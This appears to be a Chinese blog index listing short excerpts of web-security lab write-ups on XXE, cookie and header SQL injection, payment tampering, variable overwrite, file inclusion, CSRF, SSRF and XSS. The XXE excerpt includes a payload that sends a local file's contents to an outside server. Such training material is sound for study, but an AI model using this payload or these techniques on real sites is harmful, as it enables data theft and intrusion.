XXE实体注入
有自己服务器的请看http服务根目录下创建xxe目录1.首先把1.xml上传至xxe目录 文字版:<!ENTITY % all"<!ENTITY % send SYSTEM 'http://149.28.18.34/xxe/2.php?id=%file;'>"> %all; 图片版: 2.
HEAD注入-3
cookie注入输入zkz,zkz登录系统 第一个请求包(该请求用于查询数据库账号密码 ,使用户登录成功)第二个请求包(用户登录成功后的跳转,,用户客户端提交cookie)我们在1,2,3处进行测试1’发现在cookie处会产生sql报错由上可知,存在cookie注入 方法一:接着延时注入试下延时注入成功接下来大家就懂了 方法二:报错:【uname=zxc'o
HEAD注入1-2
Header注入Rank 1Header注入: 一般header注入,是对请求头里的参数,进行注入,为什么对header里的参数注入会有用呢,这是因为一些web网站,需要记录下用户或者某些请求的信息,所以会把这些信息写入数据库,当对这些写入的信息的sql语句没有做好安全防范工作,就会被攻击。 一进入网站,咦,发现和之前的不一样,没有提示我们
在线支付漏洞
支付漏洞 TIPS: 本题在该页面,当你的账户余额大于一定数额,就会显示flag。 思路: 注册一个会员账号并登录 然后在商品中心选中一件商品,点击立刻购买,抓包 把数量改
覆盖变量漏洞
思路: 设法进入管理员后台,获取管理员权限 后台管理员url: http://localhost/duomicms2/upload/admin/index.php如果未登陆,则会被跳转到:http://localhost/duomicms2/upload/admin/login.php &n
本地包含与远程包含漏洞
本地包含与远程包含漏洞 1. 此漏洞代码审计本地环境搭建a) 访问:https://www.phpmyadmin.net/files/ 下b) 解压,放到本地phpstudy根目录下c) 修改php版本:d) 启用:e) http://127.0.0.1/pm/ 我这里把文件夹重命名为pmf) 账户名/密码:root
CSRF跨站伪造请求
CSRF 跨站伪造请求 1.理解CSRF漏洞原理 2.渗透思路管理员成功登录网站后台,在管理员客户端处产生该网站的cookie,我们利用下面的两个链接构造poc,使管理员访问或者点击我们构造出来的链接,从而使的网站以为是管理员在执行操作。 3.根据漏洞代码构造链接(此文不讲代码审计) {代码审计请看:Dedecms V5.
SSRF>漏洞和利用
SSRF漏洞和利用 Typecho SSRF漏洞分析与利用:https://www.secfree.com/article-535.html附:Burp response 返回中文乱:https://blog.csdn.net/M1mory/article/details/52944840思路:主要根据存在ssrf漏洞的url进行提交数据,根据返回的状态码和消息,进行判断端口是否开启,再
注入—全方位利用
注入—全方位利用WP
XSS靶场
三种类型对应三个文档